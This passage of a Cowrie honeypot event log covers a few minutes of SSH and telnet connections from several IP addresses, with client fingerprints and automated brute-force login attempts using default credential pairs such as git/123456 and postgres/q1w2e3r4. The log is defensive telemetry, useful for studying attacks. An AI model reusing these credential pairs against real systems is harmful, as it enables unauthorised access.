2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:59:43.580493Z","src_ip":"212.227.125.160","session":"47860fd3b87e"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"111111","message":"login attempt [weblogic/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:59:44.107532Z","src_ip":"212.227.125.160","session":"47860fd3b87e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34656,"dst_ip":"1.2.3.4","dst_port":23,"session":"0afd679c3fdf","protocol":"telnet","message":"New connection: 212.227.125.160:34656 (1.2.3.4:23) [session: 0afd679c3fdf]","sensor":"my-vps","timestamp":"2025-08-28T12:59:44.740922Z"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:59:45.294472Z","src_ip":"212.227.125.160","session":"47860fd3b87e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53784,"dst_ip":"1.2.3.4","dst_port":22,"session":"baeea0ddb294","protocol":"ssh","message":"New connection: 212.227.235.229:53784 (1.2.3.4:22) [session: baeea0ddb294]","sensor":"my-vps","timestamp":"2025-08-28T12:59:55.510755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:59:55.511595Z","src_ip":"212.227.235.229","session":"baeea0ddb294"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-28T12:59:55.769883Z","src_ip":"212.227.235.229","session":"baeea0ddb294"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:59:56.566352Z","src_ip":"212.227.235.229","session":"baeea0ddb294"}
{"eventid":"cowrie.session.closed","duration":30.81173539161682,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:00:15.552590Z","src_ip":"212.227.125.160","session":"0afd679c3fdf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37350,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a538bd8eb2f","protocol":"ssh","message":"New connection: 212.227.125.160:37350 (1.2.3.4:22) [session: 2a538bd8eb2f]","sensor":"my-vps","timestamp":"2025-08-28T13:00:19.460541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:00:19.461272Z","src_ip":"212.227.125.160","session":"2a538bd8eb2f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:00:19.629938Z","src_ip":"212.227.125.160","session":"2a538bd8eb2f"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"1234567","message":"login attempt [weblogic/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:00:20.138199Z","src_ip":"212.227.125.160","session":"2a538bd8eb2f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:00:21.313635Z","src_ip":"212.227.125.160","session":"2a538bd8eb2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42154,"dst_ip":"1.2.3.4","dst_port":23,"session":"6dcb32dfddaa","protocol":"telnet","message":"New connection: 212.227.235.229:42154 (1.2.3.4:23) [session: 6dcb32dfddaa]","sensor":"my-vps","timestamp":"2025-08-28T13:00:29.733891Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44238,"dst_ip":"1.2.3.4","dst_port":23,"session":"425ecdc469ed","protocol":"telnet","message":"New connection: 212.227.235.229:44238 (1.2.3.4:23) [session: 425ecdc469ed]","sensor":"my-vps","timestamp":"2025-08-28T13:00:33.952830Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44246,"dst_ip":"1.2.3.4","dst_port":23,"session":"4c0cf39344a5","protocol":"telnet","message":"New connection: 212.227.235.229:44246 (1.2.3.4:23) [session: 4c0cf39344a5]","sensor":"my-vps","timestamp":"2025-08-28T13:00:35.857522Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44260,"dst_ip":"1.2.3.4","dst_port":23,"session":"d25296936aaf","protocol":"telnet","message":"New connection: 212.227.235.229:44260 (1.2.3.4:23) [session: d25296936aaf]","sensor":"my-vps","timestamp":"2025-08-28T13:00:36.915059Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30002,"dst_ip":"1.2.3.4","dst_port":22,"session":"44f5f1e109c4","protocol":"ssh","message":"New connection: 212.227.125.160:30002 (1.2.3.4:22) [session: 44f5f1e109c4]","sensor":"my-vps","timestamp":"2025-08-28T13:00:46.335958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:00:46.337014Z","src_ip":"212.227.125.160","session":"44f5f1e109c4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:00:46.416955Z","src_ip":"212.227.125.160","session":"44f5f1e109c4"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T13:00:46.830361Z","src_ip":"212.227.125.160","session":"44f5f1e109c4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:00:47.912328Z","src_ip":"212.227.125.160","session":"44f5f1e109c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57564,"dst_ip":"1.2.3.4","dst_port":22,"session":"dae2f9aae7f4","protocol":"ssh","message":"New connection: 212.227.125.160:57564 (1.2.3.4:22) [session: dae2f9aae7f4]","sensor":"my-vps","timestamp":"2025-08-28T13:00:54.769153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:00:54.791090Z","src_ip":"212.227.125.160","session":"dae2f9aae7f4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:00:54.944142Z","src_ip":"212.227.125.160","session":"dae2f9aae7f4"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:00:55.736789Z","src_ip":"212.227.125.160","session":"dae2f9aae7f4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:00:56.906882Z","src_ip":"212.227.125.160","session":"dae2f9aae7f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41898,"dst_ip":"1.2.3.4","dst_port":22,"session":"949f6997b61f","protocol":"ssh","message":"New connection: 212.227.235.229:41898 (1.2.3.4:22) [session: 949f6997b61f]","sensor":"my-vps","timestamp":"2025-08-28T13:00:57.969864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:00:57.970793Z","src_ip":"212.227.235.229","session":"949f6997b61f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:00:58.179043Z","src_ip":"212.227.235.229","session":"949f6997b61f"}
{"eventid":"cowrie.login.failed","username":"boss","password":"boss@123","message":"login attempt [boss/boss@123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:00:59.055782Z","src_ip":"212.227.235.229","session":"949f6997b61f"}
{"eventid":"cowrie.session.closed","duration":30.449541568756104,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:01:00.183328Z","src_ip":"212.227.235.229","session":"6dcb32dfddaa"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:01:00.266920Z","src_ip":"212.227.235.229","session":"949f6997b61f"}
{"eventid":"cowrie.session.closed","duration":31.207935571670532,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:01:05.160688Z","src_ip":"212.227.235.229","session":"425ecdc469ed"}
{"eventid":"cowrie.session.closed","duration":30.349083423614502,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:01:06.206509Z","src_ip":"212.227.235.229","session":"4c0cf39344a5"}
{"eventid":"cowrie.session.closed","duration":31.261800289154053,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:01:08.176790Z","src_ip":"212.227.235.229","session":"d25296936aaf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58080,"dst_ip":"1.2.3.4","dst_port":22,"session":"1926567675df","protocol":"ssh","message":"New connection: 212.227.235.229:58080 (1.2.3.4:22) [session: 1926567675df]","sensor":"my-vps","timestamp":"2025-08-28T13:01:27.940553Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:01:28.117609Z","src_ip":"212.227.235.229","session":"1926567675df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41384,"dst_ip":"1.2.3.4","dst_port":22,"session":"e24db4495f17","protocol":"ssh","message":"New connection: 212.227.235.229:41384 (1.2.3.4:22) [session: e24db4495f17]","sensor":"my-vps","timestamp":"2025-08-28T13:01:28.295500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:01:28.296380Z","src_ip":"212.227.235.229","session":"e24db4495f17"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:01:28.474912Z","src_ip":"212.227.235.229","session":"e24db4495f17"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"q1w2e3r4","message":"login attempt [postgres/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-08-28T13:01:29.014189Z","src_ip":"212.227.235.229","session":"e24db4495f17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51438,"dst_ip":"1.2.3.4","dst_port":22,"session":"a20a5421c390","protocol":"ssh","message":"New connection: 212.227.125.160:51438 (1.2.3.4:22) [session: a20a5421c390]","sensor":"my-vps","timestamp":"2025-08-28T13:01:29.994532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:01:30.030613Z","src_ip":"212.227.125.160","session":"a20a5421c390"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:01:30.193235Z","src_ip":"212.227.235.229","session":"e24db4495f17"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:01:30.204914Z","src_ip":"212.227.125.160","session":"a20a5421c390"}
{"eventid":"cowrie.login.failed","username":"git","password":"password","message":"login attempt [git/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:01:31.337518Z","src_ip":"212.227.125.160","session":"a20a5421c390"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:01:32.516631Z","src_ip":"212.227.125.160","session":"a20a5421c390"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43422,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6830d226a4e","protocol":"ssh","message":"New connection: 212.227.125.160:43422 (1.2.3.4:22) [session: d6830d226a4e]","sensor":"my-vps","timestamp":"2025-08-28T13:02:06.927708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:02:06.930630Z","src_ip":"212.227.125.160","session":"d6830d226a4e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:02:07.101220Z","src_ip":"212.227.125.160","session":"d6830d226a4e"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456789","message":"login attempt [git/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:02:07.971865Z","src_ip":"212.227.125.160","session":"d6830d226a4e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:02:09.147502Z","src_ip":"212.227.125.160","session":"d6830d226a4e"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":12691,"dst_ip":"1.2.3.4","dst_port":22,"session":"30bddde50ebb","protocol":"ssh","message":"New connection: 80.94.95.15:12691 (1.2.3.4:22) [session: 30bddde50ebb]","sensor":"my-vps","timestamp":"2025-08-28T13:02:36.051783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:02:36.052486Z","src_ip":"80.94.95.15","session":"30bddde50ebb"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:02:36.104133Z","src_ip":"80.94.95.15","session":"30bddde50ebb"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1","message":"login attempt [backup/1] failed","sensor":"my-vps","timestamp":"2025-08-28T13:02:36.431444Z","src_ip":"80.94.95.15","session":"30bddde50ebb"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abc123","message":"login attempt [backup/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:02:37.484931Z","src_ip":"80.94.95.15","session":"30bddde50ebb"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abcd123","message":"login attempt [backup/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:02:38.539224Z","src_ip":"80.94.95.15","session":"30bddde50ebb"}
